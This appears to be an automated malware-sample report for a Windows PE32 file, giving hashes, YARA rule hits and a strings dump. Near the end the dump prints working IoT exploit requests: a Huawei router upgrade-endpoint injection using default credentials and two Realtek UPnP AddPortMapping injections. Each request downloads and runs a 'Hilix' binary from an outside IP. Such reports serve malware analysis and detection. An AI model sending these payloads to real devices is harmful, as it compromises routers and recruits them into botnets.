Sample details: 5b6579ac9dab88514931ce9247c7d789 --

Hashes
MD5: 5b6579ac9dab88514931ce9247c7d789
SHA1: 24b7cc0d204e912e5ab94441f7f0e87ebaab71bf
SHA256: ba1f15518ceb0601fe6681d10544ea432bc06d400ed73541b10d70f79aaf6cac
SSDEEP: 3072:9fg0NBlu9CNTed7/kBazzFbULTjLtOO4oQB:9Y0NvuUN6F/M4qvnv4oQ
Details
File Type: PE32
Yara Hits
YRP/IsPE32 | YRP/IsWindowsGUI | YRP/IsPacked | YRP/HasRichSignature | YRP/maldoc_find_kernel32_base_method_1 | YRP/domain | YRP/contentis_base64 | YRP/CRC32_poly_Constant | YRP/RijnDael_AES |
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
.wtq999
.reloc
_Wj	hP
u=j Ph
tJj.Xf
j\Yf9LF
Y@Y_^[
YWWWh44@
VVVVVWQ
t<jzja
QQQQQQQP
jZf@Yf
PjXj	h'
SVu:W3
Pj	j	h
YY_^[]
OH_^[]
3^83^`3
3F(3FP3Fx3
3N,3NT3N|3
3V<3Vd3
~ 3~H3~p3
3^@3^h3
3F03FX3
3N43N\3
3VD3Vl3
^$3^L3^t3
_:?;>!UV
P]B#`M# <L2aR;SQ[bA4
bc%+-R
`(@69MS
(U]KG&&,
Q0(O(2aQ?'H+1U[Y2#F6HJJC.@P
#` /=(!-^
AL)8VKNV%
expand 32-byte kexpand 16-byte k
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
pp|B>>q
aaj_55
UUPx((
cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
uuuu				
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
RRRR				jjjj
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy    
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
SetErrorMode
KERNEL32.dll
_<kilHx
s,tuH:
\x/]ry
NFa$L[
wFoz\^P)
^+t4*jR
:c,~Eo3`
	QCpg2
?*ov";u
"vIDT	
?<1OvkeD`
Q&(*/+
|PP'W,
	?H=yJ2 
5kW=Tfq
8Jz&6B
UqV|d/
+q+S~?
:Q5gIE
d-@;w\m
)I8nI)
cH%!Ki
8tja>j
A#fjR0
$nIt*4
mVzEVN
16GG;_(
2%UL0_>
z	28~f
Tw&IGa
3qZ|ES=,
&"a{(	
^XtpU4
oyocS%
Igzo/3F6	#
(XYM~~r
*vlg}f
z_?`g}
4eM8[P1
<zv DZ
Nu.S.@V'
.]dw"&
*m\"R2
y}}fc`~
Ejp1aQ4<
9YQeNHo
#P8-V[
%v?1Gj
|jr;FL
1C,p"h
-4@pWj8
 g^vI)
,> cRYK
B5.s;Q7k
Z(:Y`B
R~+9`YSbY
aNQWr:
%-p7z<`~
dRPme$J
rW]Y/g
Bbl.;\
$noVt#
H{kI~~
yt|NOd
/}M"}#g
r!MV?Z
%iaaz[w
<eRpff
i[T;2 iM
@jl@:95
k;H(	@x\>|
%ZjONH
62'2.U
LdVV3)
gl2vJ?
9NpN	:'(
s7,	5C 
Uu1;4;:j
N6/N 3.1
ae3$*D
W.*mfi
l&9U{U
qibz[~j3b
vu +se
V'p1>#|
~8``b6M
wikpx6|x'H
A!lc`f,
ejZMyRBM33N18NnnLKzQpjjPoRFimEC9
vQ5"lW
7	yYP+
3B<rZ}>$Q
Y*Q9LA;(
:Di+K>)usN
h_zGq2K
NYu~f=PMm
Y(k]rW
U~{{Aa
['A0!D
++p8`g
TZ4C:R
X}YruL
B>XsvV
w}b1oN
W;y"GY
d,U2Nk
@w[WL;
!}+$[5{
@T9_}|
wSwqeh
!od>Ey
!iF"Jk
f?xqeB`5
dK4:2T}
Op^hkG
|`uRNk
	*dP"Wa-Mhns(
\D%Lo(
Se"rXf	
l>P\!{	
s&,Wf)
T=Td+?
|..5qi
os)!6;
Kf>&-$~
SS4[lJ=
Bv:BTT
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.82.185.164 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
23.82.185.164
Hilix @Usip
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://23.82.185.164/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
5: '8%
5%!5&=;
'!$$;& 
$5''#;&0
509=:efg`
& agad
<;`!?!b5 
?;: fdd`
<!: acam
509=:efg
g1$a#f!
,7gaee
,7gael
,7gaea
"' 5&759fdea
fdeadbdf
. 1m,ea
"1& 1,fa1? ?'efg
0125!8 
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
;::17 10t
;!&71t
:3=:1t
/dev/null
.shstrtab
.rodata
.ctors
.dtors
1<1L1h1
2%2,24292>2C2c2y2
3@4H4Q4X4m4y4
6+6F6`6}6
7I8]8m8}8
8B9V9`9s9}9
:-:K:d:
;!;*;3;<;E;N;W;l;q;
;!<E<a<
=`>p>z>
2*252@2E2_2
5)595_5
? ?(?.?4?:?]?d?z?
2-2:2B2I2R2
373L3q3
4'4D4a4k4z4
5#5(5L5Y5
6$666P6Y6
607S7a7
<J<S<|<
=%=K=n=u=|=
>B?_?w?
1;1N1W1c1k1
2N2X2}2
3&3+353:3@3K3d3K4T4
6)6/6t6y6
6&7?7m7-8F8U8
;';>;h;|;
<,<0<m<
> ?6?]?w?
0&060<0P0{0
0N2T2^2d2w2
3?3X3j3
0?0F0^0o0x0
4/5`5Q6X6_6f6m6t6{6
=3=L=n=
0.191[1
2:2S2z2
<,<6<S<Z<g<t<
<%=/=;=H=e=l=y=
>&>0>J>T>a>n>
?2?E?Z?
0&0P0f0z0
0D1[1o1{1
3&323b3
4H4Y4i4x4
H9B;^;
@0D0H0L0P0T0